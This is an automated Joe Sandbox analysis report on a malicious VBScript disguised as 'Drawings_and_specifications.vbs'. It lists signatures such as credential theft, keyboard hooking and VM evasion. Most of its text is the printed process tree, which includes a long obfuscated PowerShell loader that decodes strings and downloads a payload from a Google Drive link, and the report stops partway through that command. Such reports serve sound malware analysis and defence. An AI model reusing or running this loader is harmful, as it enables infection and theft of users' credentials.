Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Drawings_and_specifications.vbs

Overview

General Information

Sample Name:Drawings_and_specifications.vbs
Analysis ID:12383
MD5:b1abf17a8d087849ecc7e178684bba39
SHA1:c3829bc4c5cf797eb636a94dda9aa01054ebecee
SHA256:7382bb30b28a4db6baa816a694925b98ce6501a4d97d0d62fe3f27f2f26e3117
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Uses ipconfig to lookup or modify the Windows network settings
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 7124 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Drawings_and_specifications.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • ipconfig.exe (PID: 6164 cmdline: ipconfig /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • conhost.exe (PID: 4452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1820 cmdline: cmd /k echo hell MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 3588 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 LDSlA KFWaFPiF mFSyESt9NoFKoECoEVa8 VEEw8 V'Di;Ra`$ PD UeGumAko Sg L3 I= SK ao en Rs KtRi0La2Un K' SCBo8 CEFe2EmEGu8FiEShFBuFRaE PF M6 SBTu5 HCSl9AaETjE AFPo5 GECyFinF C2MiF o6FrF MEaiB D5GrD T2 QF N5 CEHyF BFSaE BEOv9 CFDi4HjECiBbrCSe8 BF ME VEFe9ciERiD FF S2PaF D8 SFKaESlE D8laB s5SvD S3 OFKoASuFIn5StFViFJaFRe7ReFSpESyCSk9 BF JE TF eDSo'Pa;Ov`$HyDPeeMomChoIngKo4So= pKFuoPan Fs PtLa0Pr2Af Ja'BuE o8 RE SFFlECh9ChFBr2TaF P5LaFNyC P'In;Sy`$PhD seBemPhoPag r5Kr= oKPooRen Ts Stbi0Ul2Po D' RD GC TFSyESkEAuFCoDra6 TF P4 PFStFHyE WE JFKr7 AF OEFlD a3NoFReA FFOr5 IF FF SF b7 NF HEYe'br;So`$PeDAmeImmKuoRagFo6In= iKSpoBnnDes Dt U0Co2Ti Fo'MaC S9 CC SF SCus8elE UB UFGeE SFRu8JeFSp2UnFMeA IFBo7MaDKa5 aFFlAUnFSe6FoF oE ABRh7viBNoB RDVu3BjF B2 RFBiFThFZaEMuDSi9 FEUd2 CCTu8HeFTi2 FF BC LB T7DrBSeBPiC wBWeESuEekFHa9 EFCo7NoFSp2MeFJo8Ce' S; M`$ SDAqeOrm PoBagSe7Af= CKPro DnResKat K0go2Re Un' TCRu9 PEOpEBaF C5 AE AF SF A2LaF D6StFAnEKoBBe7doB PBGlDSl6 IF PA WFRe5 UF fAAwFVoCPrFFiETiFUnFOs' d; S`$olDChe Rm GoKvgLa8sc=EkKSeo Un Ls Ct S0ba2 P E' SCGr9 SFHaE TFUtD UF C7JuFUnEWrF F8SaEPrF CFCuEInFFoF HDGeF TF UEGrFOb7TuF PEPoF BCemF NAFiE NFMaFefERe'Dr;Mi`$CrDKoeComSeoUdg K9Va= RK IoSpn ds Ut o0 A2 R Sm' GD A2OpFTa5 TDTa6SoFFaEDeF e6 VF l4foE N9HyESt2CrDHu6AvFUs4IlFChF MEPiEPrF F7foFskEFo' A;Fl`$ SEVolHee FvTeaSet Ao CrPrf RoVa0pr=PrKMio Gn MsRutTb0Ch2 g in'OpDSl6OpEAp2UdD BFSyF NE PFCo7TeF WEGrFEmC PFSuA hE TFCiFdeEAiCReF EE b2 tE LBSeFAfESl'Re;St`$AlE PlUne Ov baBet Do Gr IfStoSi1re= MK SoAcnPhs VtRe0Hu2Im By' ODFo8 OFAu7FoF SATuE S8 SE f8grBLi7 CB LBOmC TB WEReEFlFGo9UnFHv7 AF I2 MF U8 NB H7 EBTaBCoCAf8 aFMiEGuFReAPuFTo7PrF uE YF AFPaB F7 aB EBUdDHyA DF A5CaE M8LoFOp2duDPa8PrFUt7ToF OAUrEPr8GaEUn8WhB H7ReB CBOvDChAPrEEcE SEOpFKlF P4RiDIn8IsF V7SmFcaAReEVa8 HESs8 B' C;Fo`$ VEMil Pe Bv IaSttOvomarBrf Aosk2 P=BoK So DnHis VtPa0 d2 P Hy'GeD h2 IFSn5TeE JDBuF F4 LF N0 NF AEfj' v; T`$BrESkl RePev IaFltHkoGlr RfStoFo3 F=UnK Oo Tn As LtPi0Yo2Pa C'DiC BBCoEBoE FFVl9 PFSt7StF F2 PF B8PeBin7DiB NBPoD M3coFMh2SiFPrFNoFDiE PD J9 UE F2 TC S8 TFUn2KuF RCRaBGl7PoBReB SDSi5diFAuE BE TCCaC S8MyFMe7 BF T4ReEodFTiBSp7AnBUsBReC ID SFko2 MESt9KaE SF PEArE NF MAKrFOf7 S' U; D`$ SERelPaerevPia DtIno BrRaf Bo A4En=UrK Mo nnScs AtBe0 S2Tr Sv'LaCSnD SFSt2AnEFu9VaE KF EENeECaFKeAMyF B7AsD GASaFAd7 YFAl7DrFTj4 TFmi8 b' S;Co`$ NE OlSueEpvCla Mt no CrRef Oo h5Dr= EKCooBenMesImtMa0Ki2Py in' KFGa5KnETiF MFHyF IFSk7veF e7Lb' C;eu`$ EE Pl deThvKoaEvt Ao ArRef Co D6 T=buKFooGunVas RtSo0Pa2Tr Ba'HyDLs5 PE KF ACEfBSuETe9 kFHj4InESpF SF FEhoFSh8 SE NFsaCUdDReF c2PaETi9 jE PFReECoEMaFPrAArFOv7 PD A6TuFStE VFMe6DeF K4BeE W9 uE O2Ph'Ha; C`$ rEHol Ce Sv TaNot SoSer Ff Co K7 T=MoKafo Sn As VtFe0Pl2Ba Kv'PuDIn2 OD SE SCCo3Me' A;Bl`$KuEcalOveTrvPla stMaoEqrFlfSto S8 O=MaKTroSynQusRetUd0 H2Al Ly' EC P7Ta'Bo;Fi`$SeV Oa PtHetAfpsepBuePl=DeKHooConRus Ct A0 L2Sk Er' TC HEVgCMo8 TDPsE ECBl9 JA S8MyAMa9 K' H; P`$UnDZieObv ei HlHjeSedWrjSw=GaKEroConStsAgtCo0 P2 N Vs' AD G8ouFkoAimFMa7UnFEn7GaCBrC MF U2 NF R5 DF oF DF O4LiEAnC BCFaBcaERe9 SF D4TrF K8SnDRoADi'Ch;MefKnuarn Ec PtUsiMuo Bn S SfPrk PpSm Kv{MaPBea CrMea Cm v Cr(Cl`$ FK Go EmNiiStn BtHae Fr MnRef E,Fd D`$AbBRia CcPokps) C Mi L Sc M li; W`$ AFdia dgOpgSarBeuRopOrpMo0Sv El=TaKKao anImsUntPo0Fy2Am A'DgB FF WCSlDMaFBiA FEPa9 GF L6 BF m9TeB DBBeA S6 SBCaBHnB E3 FCsh0 ID TAViEDyB SEbiBMaD NF AF N4NoF I6reF MA KF M2PiFAf5 hCDe6 sAEc1 SABa1meDFl8 SE TE HENo9StEco9MaFKuE HFCo5 VELiFPrDPaF AF S4LaF P6 SFTaAArFTr2 SFSl5 PB M5KoD mCclF AE RE FF CD UAPlE U8gaENa8AkF dE CFRg6 CFSh9 PFBr7 MFBe2 SFDrEAnEDi8OpB S3LaBBa2 CB WBPiE M7TeBSeBseCSuCAfF C3 SFUhE SE P9 HF AELaB M6 PDlo4 BFSn9 RFlj1AgF EEInFIn8PaEDoFAuB FB ME B0BeBcaB OB LFmiCBe4UnB U5MiDAkCPrF N7skFSk4RaF T9 UFBiA cFAf7 CDCaA RE T8FuE U8 CFSyE BF D6 TF U9SiF C7trECo2 mD L8UnFLfAOvFBe8TrFta3SaF DEcaB TBPeBHy6veDSpA VF R5 GFMoF LBArB SBBoFKrCVv4DyBIn5ToDOu7 EF M4 bFBa8 AFPoAdiEReF SF S2PaFCo4 FFPr5 PBUd5KaCMi8StE RBAaFFa7svFWe2PlE AFAuBTo3FoB FFStDBuELnFOu7AxFGhE TENoD SF SAspEOfFArFNo4kiENd9MgFveDCoFHe4ElAAn3OpBFa2OnC J0 HBPa6SoA TAUnCPa6BeBKa5MaDtiEGeEDaAStE rE SFMiALeFMe7NeESu8 KBSa3 SB sFLuD PF SF IE VFCu6 GFFl4 FFPeCBrAPsBUnBSt2slBclB DERe6 ABBi2 MB S5 LDSuCUnF NE UE SFOaC BFCoE T2 VE bBDiFwaEEnBSa3FoBJoF WDunF BF RE FF E6nyFDa4RoFmiC RASaA AB A2 S'Sm;Ex& R(Fr`$ FEdelReeUnvVia MtSpobarSlfOuopu7Go) U A`$koFSeaAdgStg ArEsuEnptapNy0Mi;Pa`$CrFBraAwgSyg DrBiuCop SpCl5Re S=Me SlKCooafn Es TtEu0 U2An Sh'ReBMoF SD PD TFKu7 BF UASlFAdC AF OCStFGaEwaFFj7SaBOvB IAMu6KeBFoB LB SFFoC FD TFUbA EE A9SkF u6PaFAn9ArB R5StDVeC FF TEIrEDeF UDRa6 HFexESaE FF SF P3 MFPa4 TF DFInBWa3GcBStFmeD AFViFReEFrF k6UdF B4 KFUnCAtASk9 oB P7SpB PB ECOf0ShCInFUfESl2PrESpBCaF HECrC B0HeCHa6 GCPr6 FBTaB GD SBBuBDg3ReBUnF HDTaF pF FEAtFAp6StFDa4grFVdC BASo8BrBIn7 GB FBVoBBeFGrD WFDeFgeE HFBu6 bF A4neFAsC DA MFGlBRu2 tB R2 S'Pl;De& T( D`$ BE Tl Ie BvPaa FtGioCarDef CoFr7 F)vi No`$SkFNyaAfgRog Or Su Fp Tpep5 M;Ko`$ DFFjaZog fgCirMau Pp SpTr1 P mo= D StK SoEanSts LtSt0 R2 C D' OEFi9KaF sEKeE LFalEgaE TETr9 DFOd5CoB OB FBKoF dD MDSpF A7FoFWrA SF EC LF YCAlF jE CFFy7GaB L5 OD L2FnF F5liE RD CF U4SuFTh0TrF FE SB K3scB PF lFPl5TrE DESyFPr7IlFal7 KB G7InBStBIlD ABUnBCe3ViCBr0GuCDr8PiEDi2 TE u8 HECrFstFPsELiFCh6DiBBj5AsCFl9 RESpE mFSk5 FEkuFInF S2OpFIr6OvFViEThB G5 MDDe2BeFKh5HyEStF AFBoE NECo9LoFGu4LiESpBNaC T8ObFPrE DEBi9BiE RDPrFcy2 UFFr8StF TEAlE P8TiBUd5NaDDa3SaFGoAReFSh5 CFDeFunFId7 uF eELaC S9GyFTuEfaF DDWaCKr6OvB K3 BDAn5 VF HE eEArCKaB S6 UD L4UnFLi9FiFme1ByF TEChFAl8 HE EF ABpaB ACGa8 SE K2AeEEn8 AEStFbeFSrESuF C6BeB V5 AC E9PeE SEHaFUn5SnESoF BFGl2seFDi6 DFVaE KB S5GaD O2WiFSc5 iE NFKrF ME BE R9 MFPl4PeEDeBUdCAp8 BF NEprECa9UdE CD CFSy2 RFCo8MeF QEsjE E8ScB C5EjD O3UnF PASiF d5LeFVeF CF R7 RFTaEHeCTi9LeFDyE PFUnDPeBIn3ViB S3KrDAb5TaFHiEBrEGrCprBfu6StDTr4FuF T9InFDg1SuFLiEDeFmy8BlE RFMiBIaBSmD U2KlFKe5InE uF TC GBHoE EFEfE P9 BB U2StBSa7huBUmBTeB S3BiBSpF CC ND jF GA FE T9OpFVi6 SF N9 UBTi5HjD GCDrFDeESuEHaFAmD S6AuF PEReESaFFrFDs3ObF D4 RFBoFPoB b3TiB SF iD CFCoF eEUnFUn6 CFPo4AaF ACBoADeEFoBTe2 aBPy2AzBIn5AsDSy2 LFUd5 sEAkD IFVe4BiFBh0 HFPoEDaBFo3 RB RFUnF R5OeEPrE FFFr7paFOv7 CB I7 HB IBinDsuBLeB U3ReBUnF ODUn0OsFAr4 SF S6SuF B2 SFAn5ChETiFAfF KE KEAn9 gF d5TuFMaDhoB s2CaBLi2 TBHi2 IB H2GrBWa7AnBdoB aBskFAwD H9SuFUnA GF A8agFOr0 TBsv2PrBLe2 M'Be;Be&Fr(Fr`$ViE Al Te TvRaaEotIno HrTifPtoSk7St)Im S`$waFslaFog MgMurhauSkp KpKu1 A;Fo}Exf JuUnn Ac BtPricho inHj NeGDiD CTDi D{PiP SaInr Ga DmPl H(Ok[LaP Pa frVaadbm UeQutDieStr S(BoP KoOus ai dt TiAloRinHn M= G Pa0It, C HjM LaWen fd KaMrt sosprNey V St=Ge G`$TrTLirKou Oe U)Jo]ha Pr[foT Uy TpUde H[Re]Ut]Ch H`$ KMMieSpd CiTwcVioBefPo,Ov[SlPRoadrrIsaPlmSue Et KeKir r( CPMeo RsFyiMatFoiFrotrnPu Le= S El1St) L]Wa Ly[BeT VyIgp Fe G]Va Id`$SeM EeCad fp Sl HaTennobgrlMai A S= F Sl[ TVbao Ui Ed U] S)ve; K`$UdFSya Eg SgSerMau TpBlpCh2Hy E=Va ErKProTrnClsDet B0Le2 A Af' RBBeFFoD K0 DEHo9AfE B2 SFArFCyEBa8LeF KDIoF A2FoBdeB WAVo6PyB EBOmCwa0 JD BAArE OBNeE BBEvDReFHjF G4 IF P6inFWoAreFDi2 FFKo5unCAg6PaAMa1StARa1CoD s8reE PE DE h9 HE R9AaFLiETrFPl5 SEDeFUiD MFUnF T4ReF B6SiFGaAMaF L2AaF e5SiBFl5VaDStF UFshECeF GDVeFAi2 EFSi5 KFFrERaDVaF RE f2 AF I5moFDiAdeFAy6CoFTe2HaFPa8 ID eA GECh8 DEBe8 EFOpEInFPy6FtFBi9HuF G7AnENo2 VBMu3FeBSk3 AD T5MoFBlEFaE UCEnB O6 cDSp4opF b9ToF F1 FF CEReFMi8 RE MF VB BBRuCLe8PrE F2CiEKn8 SEGeF CFPaEAfF S6LoB F5 PCRu9TeF GE FF SDPaFUn7 VFAfEKiF S8GaE SF DF C2InF B4PuF C5 dB R5OrDCaAEmE s8 OE F8 SFUdECaF O6 iF R9BeF l7CoE B2 iDMe5 BFPrAOmFSk6HeF UEReB D3 RBSeFStD DF LF LE RFRe6 WFSu4FaF RC AA U3OdBSj2ToBRe2tvBCh7HyBfoB BCMi0 VCSl8 FE L2AuEUf8 UE TFVaF cE HFRo6SoBSh5ReCEf9ReF REOuFTaD SFOr7FlFPsE tF K8udESkFOfF N2DaFSt4GiFFr5InB S5UnD CEFiFDe6BeFSl2HaE TFAlB S5 HDTuAMiESt8 NETo8ScF AELyFBr6 BF P9 rF H7 hEPh2 KDLa9StE EEAfFdr2PlFJe7VaFTrF AFPoEDiE R9FoD DAPrFTr8 WFMi8 FF TE HEUn8VaE U8SiC C6MoATa1UnA S1FyCCy9KaE AE PF C5 FBDi2 dBEx5PrDTeFKlFanEVoF GDSlF I2JiFUd5DeFgaE EDRhF UENo2 MF S5 EFInAUnFDi6PyFLo2 VFBo8ApD n6 DF O4 AFTaF VEMeEAiF A7ObFUnEAaB F3 RBMiFTiDTaFenF AEDiF H6EuFfr4ByF HCDeATi2TiB I7 NB SBOpBAfFSpFBaD AF TA DF C7BaE U8SnFpoETeB U2SaBSl5 sD UFExFclESlF RD MFba2ReFSa5UnFElE HCFaF mE T2ViETiBcuFPoEWoBIm3OpB CF QDgaE NF P7DaFMoE PEArDJeF EAEkERuFKiFCo4InEBi9JuFFoDFrFOn4KeAEcB BBPe7 EBKlBfrB EF RD EE DFFi7 BF BE GEKrD WFVeASiE BF FF Q4 PE r9InF MDAuFUd4FoA SA PBMe7BuBReB EC S0VaCAm8DeE F2TrE V8KoE PFStF SE SF P6WhBEp5 OD H6LeEAfECrF T7ScEBuF AFun2 BFBe8 OF JAUnEGa8VaEMaF BDDiFAnF PE MFBr7 RFTyEUbF RCStFGaA UEUdF TFCaEEkC E6 SBRo2Ch' B;Tw& B(Ma`$ BE Tl WeCrvIna mt DoCorKrf AoOv7 D)Ba Vi`$MeFHeaTigSeg RrMiuRep CpTu2 L;el`$ToF Ba Fg UgGar SuSip Mp F3Sk t=st OKBuoFon SsJatVe0Bh2Du Si'ByBceF KDSe0 DESl9ryE I2NaF SF TEWi8KlF HDLaF b2TwB H5NaDKaFvoF SEStF LD KF R2SjFFl5PsF EEAnDUn8 DF C4VeF P5 uE T8CeE MF AEDi9FiEFaETrFAa8PrENaF AFSy4 LETi9 DBFu3KiB TFunDMeFNeFPiENoF G6LeF A4 UFmoC MAFaD PBIn7 SBAlBAnCfi0StCRa8TrEMa2 RENo8PeE DF BFRuE AFNo6RyB Z5coC T9ExF CE TFhoD UFtr7LoFSnEHaF G8UnEPaFSaF S2EmFUn4 aFAn5ilB U5AnD I8EfF DANrFbl7NiFfe7 SFRu2HiFDe5PoF HC ODbo8 KFSe4WiFre5DiE BD GF MEPrFAu5 SE AFSkFVa2syF U4ThFDe5moE F8 GC T6 PASk1 CAIt1SeCMu8PrE TFFiFSoAPiFCo5ScFPoFClF SALaESa9SaFKoFFrBSt7 SBDiBMaBPaFTrD D6 BF PE TFThFCaFHy2reFSk8 iFSm4 FFKrD UB U2SaBAf5prC S8SaF lEPrE VF CD E2SlFRe6 DERgB UFSp7BaF PEriF P6UnFSaEGrF T5 FEsaFMaF KAAaE BF BFVa2BaF b4 FFAl5 BD HDTiF D7UnFGeAUnFAeCCoEAl8 SB T3SuB pFSkDLiFNaFAfEDuFpa6toFAp4 UFBaCInAenC CB I2 D' F; F&Fi( W`$PrESalNueAcvHra Ptdao Hr Af Oo K7Ex)Ve Di`$ MFCua SgIng nrIru Bp EpUd3Sj;Pi`$vrFCaa Sg CgDir BuPip MpMo4Wi R=To SsKSio Dn cs Ptud0 N2No Al'KaB UFPaD M0 TEPr9StESv2PlF TFAmE M8PiF HDKoF H2 IBRe5 UD TFSpF CE tFDeDDeFAn2 SFPi5 CFStE TD U6FiF LE gEMoFUdF S3MeF m4UdFNiF OBSc3 DBReF EDNoE CF L7TiF AEBeEovDSeFLaAKoE SFAfFUn4 IEOm9JuF OD MFTi4 SAUd9UdBth7 MB MBsiBDeF NDFaE ZFBl7 AFVeELeE bDFlF FA SE EFTeFme4ruEVe9 CFCoDMoFMe4FrAOv8 cB S7faBInBApBCoF FDFi6SaF SESpF nFHuEByB PFBr7TiFfaADeFLo5 LF S9 KFOv7 GFHv2 SB g7DoBSuBUnB SFInD S6 PFUnE LF TFDiF D2 HFJe8 HF T4 lFSyD EBWi2StBAn5 PC s8TeFPrEStE DFObDWe2 DFMo6YvEReBHeFFj7UhFEnEFuFKl6StFvuEAnFEl5RoEOrFStF UA BEAbFFuFSp2 NFAf4TaFpr5SaDSyDDeF I7PaFMaA bFRuC DE s8PaBCo3DoBBaF TD GF GFUtE UFCr6 PF S4umF SCTeAboC TB C2 A'Bu; K& E(De`$SyETalBre Uv HaUdtHeo GrNafFloOp7Fl) B Ca`$BuFmua RgJog KrCluHepDip T4Sk;St`$CoFOma Ig ag irStu Tp Fpja5Ex Ba= A SK MoPhnAmsRetWh0 S2 s Br' AECo9GrFAtE EEChF PE KE UE B9ApF F5 BBSkB DBSyFWhDLa0CeESa9EnEPe2FrFDeF OEfa8FoF FDhoFNi2FeBSi5 FDDe8 CEPe9AvF WEMuF BAChE DF GFKnE KCanFGrE s2 FE PB CFSoEFoB G3 PBDi2Re'Ne;Ko&Si( D`$ TE Al EeRev Sa EtKao RrArfIno f7 P) D Al`$FlFUnaPsgAlg MrEuuInpNap T5Sy Hj Ri Ya; A}Po`$ SINor OaCan fi MaConCu T= C DeK EoPhn SsTrtOp0Fo2 R E' FFRe0ChF ME SE H9VeF V5UbF LE KFIn7NeABi8MoAAr9ro'an; G`$TrF Ba SgAfg Wr uu KpDepLi6Pa No= N HoKSoo Tn KsOrt T0Id2Pr K'GeBDiF dDRuCObFTa7 KEBuE BF P6SeEHoBWeF U2ReBLiBfjA D6ScBMeB UC J0scC U8BaE C2PsETr8 FE EFDiFStESlFMi6 DBSu5 MC e9DoERoE BFJe5 FEEjFHoFca2 VFMi6FiF KE ABBe5NeDEn2ReF I5AnE OFBrF CEOpEKo9 SFSa4CoEunBOvC H8ZuFThE ME I9CoEAvDHeFUd2 TFTo8 BFHoETaERe8ChBNo5 bDOg6BeF LA LE V9 IEDo8 HFDy3BiF SAStFAs7 KC U6HoAsa1PrA L1 KDUnCFoFFaE TEWrFFaDLeFLoFAsE SFBa7InFMeE TFPhCAlFBoAAfE HFCaFKiEErDThDBiFSi4 FEHy9 FD rD JELiE PF P5HaFRe8ThE CFChF C2 uF N4 sFFr5JaCSpBTrFTy4 AF B2 DFEt5 EECeFDeFRaEQuEKo9UdB I3OlBVa3 CFStDLeF B0 KE PBCoBScBTrBStFKoDKe2 BEPa9DoF RA MF D5 SF J2 fFMiAKaFCa5TrBEnB aB SFFoD RECrFgu7 DFReE HECrDBrF MACrESpFIbF S4 DEUn9LuFKiDFoF P4 UAMaFBrB K2HvBCo7OsBImBCaBPr3 MD dC WD BF kCUvFMeBicBBrDToBSuBde3BeC J0GaD S2 SF O5 OEEfF sC BBPrE CFScESt9FoCRi6ovBRe7 eB kBReCKi0arC LEInDTe2 NFJo5 CEInFBaABe8OrABe9StC N6BlBDe7FyBTiB uCIn0BrC ME MD A2 FF P5 KEGaFDeA h8 GA E9 BCsk6WaBBy7FoBHeBSiCNe0OvC SEAlD O2 OFTr5DiEUnFPaA X8 SACy9 WCSu6 LBCo2InBCeBLaBPa3 CC B0FoD F2 NF K5 PEAeF SCHyB LECoFOvEVa9 EC O6 TBDa2KiB C2InBFa2 I' B;fo&Ha(Ta`$LaERul DeOtv QaVot CoChr FfLaoBa7 a) A be`$ DF SavagUngWhrStu Up TpFo6 A;De`$VrUConEnb EoEndSeyAfs DkUr gd=Eg UfApk Ap O U`$ImE HlKre SvPra Tt soFer PfTaoBu5Fo K`$ EEKalbrejev EaUntfuo SrEdfSpo M6Ni;sp`$BaFMiaFug Sg Zr TuDepFlpUn7Pr E=Mo DuK So On AsOptEt0 B2Kl e'BjBSwFKjD E6MiFWa4WaF h5 FFBoE CE O2baE D8 SF PAStE SDUrAha9UnASeB CA OCFuAPi8coBVaBDuA A6ChB DBOtB DFOvD BCReF B7 SE DEMuF A6 QEcaB WF K2InBTe5SdDKa2UnF U5TeE FDreF D4ReFst0CoFSqETaBPe3UdC K0SkDFo2abFPe5 LE KF PCdoB mE SF JE b9 SCFl6PaADe1PrAPi1SoCUd1RhF JE WEKo9FoFSy4 ABAl7 DBUnBMiA MDTaAPoEunAUnBUuBSa7EfBGeBAnABaB CEFu3LhAVi8BrA SBSpAUpBReA UB DB F7 PB IBraAMoBBrEse3FoADiFFeA tB SB S2 M' S;Ca&Fe( S`$DrE plFae SvshaSktIdo Pr Bfuno S7Vo) N h`$PrFCaaSugreg ArMiuprpKopSt7 A; B`$ SFVaa BgDeg Fr suStp Cp H8sa St= O nuKSyoBrnchsSvt s0 V2No Di' EBPaF JDFrFGaF AEDiE T8 OECoFMdBprB GASt6 KBmaBDrBEsFAtDBiC DFFo7RoEHmE TFBi6 UEReB PF F2HnB C5CoDNs2EnF F5stEFuDBeFUn4 AFBr0 TF AEUnBCo3UnCRe0 RDPe2EfF a5 hEPoF UCMeBStEInF PEki9AuC M6SnAAc1QuABr1ceC U1 UFBaEKuESu9SyFLi4ChBTo7PaB CBafAAlCFaA ECHjAUnC VAEfADeABe8MaA FFSpA VBPlAFr3SeBEv7 VB SBSnADaBTrE K3 NA e8CoASaBSuAPaBStAAfB TB F7SuBSmB AAKoB FE S3 UA DFMbBMi2 O'Sp; S&Ej(Fo`$ BEJulJae FvVaa Ltino Ur tfHuoTu7Bl) R J`$ApF Sa Sg Ng TrDeuAtpRepAb8pl; R`$frK LoAnn Js Ltca0 L1 T S= N Ci' FhAltEkt Rppes i:re/St/padInrFoi DvHeeJu. YgKooKaoAagUnl ReMo. Sc ToFom A/ Iu Rc B? BeEvxtep KoGer xtIn=EkdBaoKnwFrnDel Do KaFudHa&BoiSkdPr= S1DeIStmStsAtP HjStL Ay B7raQReq VL ka Ip Cr JcBrBBdE RvOvq PI RuSm0 twSpU W4LekFe4 kKClA EV Tm Vk T'Co; A`$ GK Bo Pn Ds FtKu0Ko0 C A= H StK PoKlnbasSptRi0 b2Mo Gl'UnBBeFFeDGo0MoFUn4BaFte6NoF S6plF uAarFAl5FaF SFEuE t9ToFHu0 RFFoABrBSiB UAMa6MiBReBUnBRe3 UDsk5 SF LEAlE SCElBUd6 SD C4SaF L9TeFGl1HaFMeEstFIn8 IE NFTuBgaBReDLi5 RFriE CE FFPuBDo5MiC BC SF GE OF B9MoDph8 SF k7SaF P2GuFAkE MFRi5ElE SFTrB m2ChBub5 FDamFIdF A4 FEDiCSuF S5MoFAu7OvF P4 bF UA TFNoFUnC P8CoESnF KENs9 BF N2ClFLa5VeFDaCTrBCh3YiB PF UD R0 PF P4JuFTo5BhE U8 HEMaFTvA CBGiA KA BBUn2 K'Pl;Cu`$ sF BaPrgHagsyr TuSapPrpSt8du Ge=Pe RKTro RnKusSwtCa0Re2 R Tr' SBLaF jDpl6KaFUn4 GF c5ByF SE AEGe2ImESa8 pFBuAsaEObDAcA C9 HAGiBEnATjC MAGa9 DA L6BaBNaFVaFMeE KFDj5TaEPrDDiA H1ArFThAFiE DBUoE CBskF rFHaFSeAInECeF TFSuA M' O; F&Co( 